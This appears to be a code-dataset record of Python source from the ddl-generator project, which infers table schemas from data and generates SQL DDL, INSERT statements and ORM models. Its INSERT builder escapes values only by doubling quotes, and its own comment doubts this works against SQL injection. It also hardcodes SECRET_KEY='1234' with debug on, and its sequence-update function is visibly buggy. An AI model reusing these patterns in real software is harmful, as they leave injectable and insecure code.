def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
"""
Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``.
"""
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result)
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | Table.sql | python | def sql(self, dialect=None, inserts=False, creates=True,
drops=True, metadata_source=None):
result = [self.ddl(dialect, creates=creates, drops=drops)]
if inserts:
for row in self.inserts(dialect):
result.append(row)
return '\n'.join(result) | Combined results of ``.ddl(dialect)`` and, if ``inserts==True``,
``.inserts(dialect)``. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L436-L446 | [
"def ddl(self, dialect=None, creates=True, drops=True):\n \"\"\"\n Returns SQL to define the table.\n \"\"\"\n dialect = self._dialect(dialect)\n creator = CreateTable(self.table).compile(mock_engines[dialect])\n creator = \"\\n\".join(l for l in str(creator).splitlines() if l.strip()) # remove em... | class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
if not self.table_name:
if pymongo and isinstance(data, pymongo.collection.Collection):
self.table_name = data.name
elif hasattr(data, 'lower'): # duck-type string test
if os.path.isfile(data):
(file_path, file_extension) = os.path.splitext(data)
self.table_name = os.path.split(file_path)[1].lower()
self.table_name = self.table_name or \
'generated_table%s' % Table.table_index
self.table_name = reshape.clean_key_name(self.table_name)
Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
# Send anything but Python data objects to
# data_dispenser.sources.Source
if isinstance(data, Source):
self.data = data
elif hasattr(data, 'lower') or hasattr(data, 'read'):
self.data = Source(data, limit=limit)
else:
try:
self.data = iter(data)
except TypeError:
self.data = Source(data)
if ( self.table_name.startswith('generated_table')
and hasattr(self.data, 'table_name')):
self.table_name = self.data.table_name
self.table_name = self.table_name.lower()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
children = {}
self.pk_name = next(col.name for col in self.data.generator.sqla_columns if col.primary_key)
else:
self.data = reshape.walk_and_clean(self.data)
(self.data, self.pk_name, children, child_fk_names
) = reshape.unnest_children(data=self.data,
parent_name=self.table_name,
pk_name=pk_name,
force_pk=force_pk)
self.default_dialect = default_dialect
self.comments = {}
child_metadata_sources = {}
if metadata_source:
if isinstance(metadata_source, OrderedDict):
logging.info('Column metadata passed in as OrderedDict')
self.columns = metadata_source
else:
logging.info('Pulling column metadata from file %s'
% metadata_source)
with open(metadata_source) as infile:
self.columns = yaml.load(infile.read())
for (col_name, col) in self.columns.items():
if isinstance(col, OrderedDict):
child_metadata_sources[col_name] = col
self.columns.pop(col_name)
else:
self._fill_metadata_from_sample(col)
else:
self._determine_types()
if reorder:
ordered_columns = OrderedDict()
if pk_name and pk_name in self.columns:
ordered_columns[pk_name] = self.columns.pop(pk_name)
for (c, v) in sorted(self.columns.items()):
ordered_columns[c] = v
self.columns = ordered_columns
if _parent_table:
fk = sa.ForeignKey('%s.%s' % (_parent_table.table_name,
_parent_table.pk_name))
else:
fk = None
self.table = sa.Table(self.table_name, metadata,
*[sa.Column(cname, col['satype'],
fk if fk and (_fk_field_name == cname)
else None,
primary_key=(cname == self.pk_name),
unique=(uniques and col['is_unique']),
nullable=col['is_nullable'],
doc=self.comments.get(cname))
for (cname, col) in self.columns.items()
if True
])
self.children = {child_name: Table(child_data, table_name=child_name,
default_dialect=self.default_dialect,
varying_length_text=varying_length_text,
uniques=uniques, pk_name=pk_name,
force_pk=force_pk, data_size_cushion=data_size_cushion,
_parent_table=self, reorder=reorder,
_fk_field_name=child_fk_names[child_name],
metadata_source=child_metadata_sources.get(child_name),
loglevel=loglevel)
for (child_name, child_data) in children.items()}
if save_metadata_to:
if not save_metadata_to.endswith(('.yml', 'yaml')):
save_metadata_to += '.yaml'
with open(save_metadata_to, 'w') as outfile:
outfile.write(yaml.dump(self._saveable_metadata()))
logging.info('Pass ``--save-metadata-to %s`` next time to re-use structure' %
save_metadata_to)
def _saveable_metadata(self):
result = copy.copy(self.columns)
for v in result.values():
v.pop('satype') # yaml chokes on sqla classes
for (child_name, child) in self.children.items():
result[child_name] = child._saveable_metadata()
return result
def _dialect(self, dialect):
if not dialect and not self.default_dialect:
raise KeyError("No SQL dialect specified")
dialect = dialect or self.default_dialect
if dialect not in mock_engines:
raise NotImplementedError("SQL dialect '%s' unknown" % dialect)
return dialect
_supports_if_exists = {k: False for k in dialect_names}
_supports_if_exists['postgresql'] = _supports_if_exists['sqlite'] = True
_supports_if_exists['mysql'] = _supports_if_exists['sybase'] = True
def _dropper(self, dialect):
template = "DROP TABLE %s %s"
if_exists = "IF EXISTS" if self._supports_if_exists[dialect] else ""
return template % (if_exists, self.table_name)
_comment_wrapper = textwrap.TextWrapper(initial_indent='-- ', subsequent_indent='-- ')
def ddl(self, dialect=None, creates=True, drops=True):
"""
Returns SQL to define the table.
"""
dialect = self._dialect(dialect)
creator = CreateTable(self.table).compile(mock_engines[dialect])
creator = "\n".join(l for l in str(creator).splitlines() if l.strip()) # remove empty lines
comments = "\n\n".join(self._comment_wrapper.fill("in %s: %s" %
(col, self.comments[col]))
for col in self.comments)
result = []
if drops:
result.append(self._dropper(dialect) + ';')
if creates:
result.append("%s;\n%s" % (creator, comments))
for child in self.children.values():
result.append(child.ddl(dialect=dialect, creates=creates,
drops=drops))
return '\n\n'.join(result)
table_backref_remover = re.compile(r',\s+table\s*\=\<.*?\>')
capitalized_words = re.compile(r"\b[A-Z]\w+")
sqlalchemy_setup_template = textwrap.dedent("""
from sqlalchemy import %s
%s
%s.create()""" )
def sqlalchemy(self, is_top=True):
"""Dumps Python code to set up the table's SQLAlchemy model"""
table_def = self.table_backref_remover.sub('', self.table.__repr__())
# inject UNIQUE constraints into table definition
constraint_defs = []
for constraint in self.table.constraints:
if isinstance(constraint, sa.sql.schema.UniqueConstraint):
col_list = ', '.join("'%s'" % c.name
for c in constraint.columns)
constraint_defs.append('UniqueConstraint(%s)' % col_list)
if constraint_defs:
constraint_defs = ',\n '.join(constraint_defs) + ','
table_def = table_def.replace('schema=None', '\n ' + constraint_defs + 'schema=None')
table_def = table_def.replace("MetaData(bind=None)", "metadata")
table_def = table_def.replace("Column(", "\n Column(")
table_def = table_def.replace("schema=", "\n schema=")
result = [table_def, ]
result.extend(c.sqlalchemy(is_top=False) for c in self.children.values())
result = "\n%s = %s" % (self.table_name, "\n".join(result))
if is_top:
sqla_imports = set(self.capitalized_words.findall(table_def))
sqla_imports &= set(dir(sa))
sqla_imports = sorted(sqla_imports)
result = self.sqlalchemy_setup_template % (
", ".join(sqla_imports), result, self.table.name)
result = textwrap.dedent(result)
return result
def django_models(self, metadata_source=None):
sql = self.sql(dialect='postgresql', inserts=False, creates=True,
drops=True, metadata_source=metadata_source)
u = sql.split(';\n')
try:
import django
except ImportError:
print('Cannot find Django on the current path. Is it installed?')
django = None
if django:
from django.conf import settings
from django.core import management
from django import setup
import sqlite3
import os
db_filename = 'generated_db.db'
conn = sqlite3.connect(db_filename)
c = conn.cursor()
for i in u:
c.execute(i)
if not settings.configured:
settings.configure(
DEBUG='on',
SECRET_KEY='1234',
ALLOWED_HOSTS='localhost',
DATABASES = {'default' : {'NAME':db_filename,'ENGINE':'django.db.backends.sqlite3'}},
)
django.setup()
management.call_command('inspectdb', interactive=False)
os.remove(db_filename)
_datetime_format = {} # TODO: test the various RDBMS for power to read the standard
def _prep_datum(self, datum, dialect, col, needs_conversion):
"""Puts a value in proper format for a SQL string"""
if datum is None or (needs_conversion and not str(datum).strip()):
return 'NULL'
pytype = self.columns[col]['pytype']
if needs_conversion:
if pytype == datetime.datetime:
datum = dateutil.parser.parse(datum)
elif pytype == bool:
datum = th.coerce_to_specific(datum)
if dialect.startswith('sqlite'):
datum = 1 if datum else 0
else:
datum = pytype(str(datum))
if isinstance(datum, datetime.datetime) or isinstance(datum, datetime.date):
if dialect in self._datetime_format:
return datum.strftime(self._datetime_format[dialect])
else:
return "'%s'" % datum
elif hasattr(datum, 'lower'):
# simple SQL injection protection, sort of... ?
return "'%s'" % datum.replace("'", "''")
else:
return datum
_insert_template = "INSERT INTO {table_name} ({cols}) VALUES ({vals});"
def emit_db_sequence_updates(self):
"""Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build."""
if self.source.db_engine and self.source.db_engine.name != 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = self.source.db_engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname || '.' || c.relname || ';'
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
result = []
for (sequence, ) in list(conn.execute(qry)):
qry = "SELECT last_value FROM %s" % sequence
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % nextval
def inserts(self, dialect=None):
if dialect and dialect.startswith("sqla"):
if self.data:
yield "\ndef insert_%s(tbl, conn):" % self.table_name
yield " inserter = tbl.insert()"
for row in self.data:
yield textwrap.indent("conn.execute(inserter, **{row})"
.format(row=str(dict(row))),
" ")
for seq_updater in self.emit_db_sequence_updates():
yield ' conn.execute("%s")' % seq_updater
# TODO: no - not here
else:
yield "\n# No data for %s" % self.table.name
else:
dialect = self._dialect(dialect)
needs_conversion = not hasattr(self.data, 'generator') or not hasattr(self.data.generator, 'sqla_columns')
for row in self.data:
cols = ", ".join(c for c in row.keys())
vals = ", ".join(str(self._prep_datum(val, dialect, key, needs_conversion))
for (key, val) in row.items())
yield self._insert_template.format(table_name=self.table_name,
cols=cols, vals=vals)
for child in self.children.values():
for row in child.inserts(dialect):
yield row
def __str__(self):
if self.default_dialect:
return self.ddl()
else:
return self.__repr__()
def _fill_metadata_from_sample(self, col):
col['pytype'] = type(col['sample_datum'])
if isinstance(col['sample_datum'], Decimal):
(precision, scale) = th.precision_and_scale(col['sample_datum'])
col['satype'] = sa.DECIMAL(precision + self.data_size_cushion*2,
scale + self.data_size_cushion)
elif isinstance(col['sample_datum'], str):
if self.varying_length_text:
col['satype'] = sa.Text()
else:
str_len = max(len(col['sample_datum']), col['str_length'])
col['satype'] = sa.Unicode(str_len+self.data_size_cushion*2)
else:
col['satype'] = self.types2sa[type(col['sample_datum'])]
if col['satype'] == sa.Integer and (
col['sample_datum'] > (2147483647-self.data_size_cushion*1000000000) or
col['sample_datum'] < (-2147483647+self.data_size_cushion*1000000000)):
col['satype'] = sa.BigInteger
return col
types2sa = {datetime.datetime: sa.DateTime, int: sa.Integer,
float: sa.Numeric, bool: sa.Boolean,
type(None): sa.Text}
def _determine_types(self):
column_data = OrderedDict()
self.columns = OrderedDict()
if hasattr(self.data, 'generator') and hasattr(self.data.generator, 'sqla_columns'):
for col in self.data.generator.sqla_columns:
self.columns[col.name] = {'is_nullable': col.nullable,
'is_unique': col.unique,
'satype': col.type,
'pytype': col.pytype}
return
self.comments = {}
rowcount = 0
for row in self.data:
rowcount += 1
keys = row.keys()
for col_name in self.columns:
if col_name not in keys:
self.columns[col_name]['is_nullable'] = True
if not isinstance(row, OrderedDict):
keys = sorted(keys)
for k in keys:
v_raw = row[k]
if not th.is_scalar(v_raw):
v = str(v_raw)
self.comments[k] = 'nested values! example:\n%s' % \
pprint.pformat(v)
logging.warning('in %s: %s' % (k, self.comments[k]))
v = th.coerce_to_specific(v_raw)
if k not in self.columns:
self.columns[k] = {'sample_datum': v,
'str_length': len(str(v_raw)),
'is_nullable': not (rowcount == 1 and
v is not None and
str(v).strip()
),
'is_unique': set([v, ])}
else:
col = self.columns[k]
col['str_length'] = max(col['str_length'], len(str(v_raw)))
old_sample_datum = col.get('sample_datum')
col['sample_datum'] = th.best_representative(
col['sample_datum'], v)
if (v is None) or (not str(v).strip()):
col['is_nullable'] = True
if (col['is_unique'] != False):
if v in col['is_unique']:
col['is_unique'] = False
else:
col['is_unique'].add(v)
for col_name in self.columns:
col = self.columns[col_name]
self._fill_metadata_from_sample(col)
col['is_unique'] = bool(col['is_unique'])
|
catherinedevlin/ddl-generator | ddlgenerator/reshape.py | clean_key_name | python | def clean_key_name(key):
result = _illegal_in_column_name.sub("_", key.strip())
if result[0].isdigit():
result = '_%s' % result
if result.upper() in sql_reserved_words:
result = '_%s' % key
return result.lower() | Makes ``key`` a valid and appropriate SQL column name:
1. Replaces illegal characters in column names with ``_``
2. Prevents name from beginning with a digit (prepends ``_``)
3. Lowercases name. If you want case-sensitive table
or column names, you are a bad person and you should feel bad. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/reshape.py#L18-L34 | null | #!/usr/bin/python
# -*- coding: utf8
import logging
from collections import OrderedDict, namedtuple, defaultdict
import doctest
from hashlib import md5
import hashlib
import copy
from pprint import pprint
from ddlgenerator.reserved import sql_reserved_words
import re
try:
import ddlgenerator.typehelpers as th
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
_illegal_in_column_name = re.compile(r'[^a-zA-Z0-9_$#]')
def walk_and_clean(data):
"""
Recursively walks list of dicts (which may themselves embed lists and dicts),
transforming namedtuples to OrderedDicts and
using ``clean_key_name(k)`` to make keys into SQL-safe column names
>>> data = [{'a': 1}, [{'B': 2}, {'B': 3}], {'F': {'G': 4}}]
>>> pprint(walk_and_clean(data))
[OrderedDict([('a', 1)]),
[OrderedDict([('b', 2)]), OrderedDict([('b', 3)])],
OrderedDict([('f', OrderedDict([('g', 4)]))])]
"""
# transform namedtuples to OrderedDicts
if hasattr(data, '_fields'):
data = OrderedDict((k,v) for (k,v) in zip(data._fields, data))
# Recursively clean up child dicts and lists
if hasattr(data, 'items') and hasattr(data, '__setitem__'):
for (key, val) in data.items():
data[key] = walk_and_clean(val)
elif isinstance(data, list) or isinstance(data, tuple) \
or hasattr(data, '__next__') or hasattr(data, 'next'):
data = [walk_and_clean(d) for d in data]
# Clean up any keys in this dict itself
if hasattr(data, 'items'):
original_keys = data.keys()
tup = ((clean_key_name(k), v) for (k, v) in data.items())
data = OrderedDict(tup)
if len(data) < len(original_keys):
raise KeyError('Cleaning up %s created duplicates' %
original_keys)
return data
def _id_fieldname(fieldnames, table_name = ''):
"""
Finds the field name from a dict likeliest to be its unique ID
>>> _id_fieldname({'bar': True, 'id': 1}, 'foo')
'id'
>>> _id_fieldname({'bar': True, 'foo_id': 1, 'goo_id': 2}, 'foo')
'foo_id'
>>> _id_fieldname({'bar': True, 'baz': 1, 'baz_id': 3}, 'foo')
"""
templates = ['%s_%%s' % table_name, '%s', '_%s']
for stub in ['id', 'num', 'no', 'number']:
for t in templates:
if t % stub in fieldnames:
return t % stub
class UniqueKey(object):
"""
Provides unique IDs.
>>> idp1 = UniqueKey('id', int, max=4)
>>> idp1.next()
5
>>> idp1.next()
6
>>> idp2 = UniqueKey('id', str)
>>> id2 = idp2.next()
>>> (len(id2), type(id2))
(32, <class 'str'>)
"""
def __init__(self, key_name, key_type, max=0):
self.name = key_name
if key_type != int and not hasattr(key_type, 'lower'):
raise NotImplementedError("Primary key field %s is %s, must be string or integer"
% (key_name, key_type))
self.type = key_type
self.max = max
def next(self):
if self.type == int:
self.max += 1
return self.max
else:
return md5().hexdigest()
def unnest_child_dict(parent, key, parent_name=''):
"""
If ``parent`` dictionary has a ``key`` whose ``val`` is a dict,
unnest ``val``'s fields into ``parent`` and remove ``key``.
>>> parent = {'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_name': 'Québec City', 'capital_pop': 491140, 'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City', 'pop': 491140}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital_id': 1,
'capital_name': 'Québec City',
'capital_pop': 491140,
'province': 'Québec'}
>>> parent = {'province': 'Québec', 'capital': {'id': 1, 'name': 'Québec City'}}
>>> unnest_child_dict(parent, 'capital', 'provinces')
>>> pprint(parent)
{'capital': 'Québec City', 'province': 'Québec'}
"""
val = parent[key]
name = "%s['%s']" % (parent_name, key)
logging.debug("Unnesting dict %s" % name)
id = _id_fieldname(val, parent_name)
if id:
logging.debug("%s is %s's ID" % (id, key))
if len(val) <= 2:
logging.debug('Removing ID column %s.%s' % (key, id))
val.pop(id)
if len(val) == 0:
logging.debug('%s is empty, removing from %s' % (name, parent_name))
parent.pop(key)
return
elif len(val) == 1:
logging.debug('Nested one-item dict in %s, making scalar.' % name)
parent[key] = list(val.values())[0]
return
else:
logging.debug('Pushing all fields from %s up to %s' % (name, parent_name))
new_field_names = ['%s_%s' % (key, child_key.strip('_')) for child_key in val]
overlap = (set(new_field_names) & set(parent)) - set(id or [])
if overlap:
logging.error("Could not unnest child %s; %s present in %s"
% (name, key, ','.join(overlap), parent_name))
return
for (child_key, child_val) in val.items():
new_field_name = '%s_%s' % (key, child_key.strip('_'))
parent[new_field_name] = child_val
parent.pop(key)
_sample_data = [{'province': 'Québec', 'capital': {'name': 'Québec City', 'pop': 491140},
'id': 1, 'province_id': 1,
'cities': [{'name': 'Montreal', 'pop': 1649519}, {'name': 'Laval', 'pop': 401553}]},
{'province': 'Ontario', 'capital': {'name': 'Toronto', 'pop': 2615060}, 'province_id': 2,
'cities': [{'name': 'Ottawa', 'pop': 883391}, {'name': 'Missisauga', 'pop': 713443}]},
{'province': 'New Brunswick', 'capital': {'name': 'Fredricton', 'pop': 56224},
'id': 3, 'province_id': 3,
'cities': [{'name': 'Saint John', 'pop': 70063}, {'name': 'Moncton', 'pop': 69074}]},
]
def all_values_for(data, field_name):
return [row.get(field_name) for row in data if field_name in row]
def unused_field_name(data, preferences):
for pref in preferences:
if not all_values_for(data, pref):
return pref
raise KeyError("All desired names already taken in %s" % self.name)
class ParentTable(list):
"""
List of ``dict``s that knows (or creates) its own primary key field.
>>> provinces = ParentTable(_sample_data, 'province', pk_name='province_id')
>>> provinces.pk.name
'province_id'
>>> [p[provinces.pk.name] for p in provinces]
[1, 2, 3]
>>> provinces.pk.max
3
Now if province_id is unusable because it's nonunique:
>>> data2 = copy.deepcopy(_sample_data)
>>> for row in data2: row['province_id'] = 4
>>> provinces2 = ParentTable(data2, 'province', pk_name='id', force_pk=True)
>>> provinces2.pk.name
'id'
>>> [p[provinces2.pk.name] for p in provinces2]
[1, 4, 3]
"""
def is_in_all_rows(self, value):
return len([1 for r in self if r.get(value)]) == len(self)
def __init__(self, data, singular_name, pk_name=None, force_pk=False):
self.name = singular_name
super(ParentTable, self).__init__(data)
self.pk_name = pk_name
if force_pk or (self.pk_name and self.is_in_all_rows(self.pk_name)):
self.assign_pk()
else:
self.pk = None
def suitability_as_key(self, key_name):
"""
Returns: (result, key_type)
``result`` is True, False, or 'absent' or 'partial' (both still usable)
``key_type`` is ``int`` for integer keys or ``str`` for hash keys
"""
pk_values = all_values_for(self, key_name)
if not pk_values:
return ('absent', int) # could still use it
key_type = type(th.best_coercable(pk_values))
num_unique_values = len(set(pk_values))
if num_unique_values < len(pk_values):
return (False, None) # non-unique
if num_unique_values == len(self):
return (True, key_type) # perfect!
return ('partial', key_type) # unique, but some rows need populating
def use_this_pk(self, pk_name, key_type):
if key_type == int:
self.pk = UniqueKey(pk_name, key_type, max([0, ] + all_values_for(self, pk_name)))
else:
self.pk = UniqueKey(pk_name, key_type)
def assign_pk(self):
"""
"""
if not self.pk_name:
self.pk_name = '%s_id' % self.name
logging.warning('Primary key %s.%s not requested, but nesting demands it'
% (self.name, self.pk_name))
(suitability, key_type) = self.suitability_as_key(self.pk_name)
if not suitability:
raise Exception('Duplicate values in %s.%s, unsuitable primary key'
% (self.name, self.pk_name))
self.use_this_pk(self.pk_name, key_type)
if suitability in ('absent', 'partial'):
for row in self:
if self.pk_name not in row:
row[self.pk_name] = self.pk.next()
def unnest_children(data, parent_name='', pk_name=None, force_pk=False):
"""
For each ``key`` in each row of ``data`` (which must be a list of dicts),
unnest any dict values into ``parent``, and remove list values into separate lists.
Return (``data``, ``pk_name``, ``children``, ``child_fk_names``) where
``data``
the transformed input list
``pk_name``
field name of ``data``'s (possibly new) primary key
``children``
a defaultdict(list) of data extracted from child lists
``child_fk_names``
dict of the foreign key field name in each child
"""
possible_fk_names = ['%s_id' % parent_name, '_%s_id' % parent_name, 'parent_id', ]
if pk_name:
possible_fk_names.insert(0, '%s_%s' % (parent_name, pk_name.strip('_')))
children = defaultdict(list)
field_names_used_by_children = defaultdict(set)
child_fk_names = {}
parent = ParentTable(data, parent_name, pk_name=pk_name, force_pk=force_pk)
for row in parent:
try:
for (key, val) in row.items():
if hasattr(val, 'items'):
unnest_child_dict(parent=row, key=key, parent_name=parent_name)
elif isinstance(val, list) or isinstance(val, tuple):
# force listed items to be dicts, not scalars
row[key] = [v if hasattr(v, 'items') else {key: v} for v in val]
except AttributeError:
raise TypeError('Each row should be a dictionary, got %s: %s' % (type(row), row))
for (key, val) in row.items():
if isinstance(val, list) or isinstance(val, tuple):
for child in val:
field_names_used_by_children[key].update(set(child.keys()))
for (child_name, names_in_use) in field_names_used_by_children.items():
if not parent.pk:
parent.assign_pk()
for fk_name in possible_fk_names:
if fk_name not in names_in_use:
break
else:
raise Exception("Cannot find unused field name in %s.%s to use as foreign key"
% (parent_name, child_name))
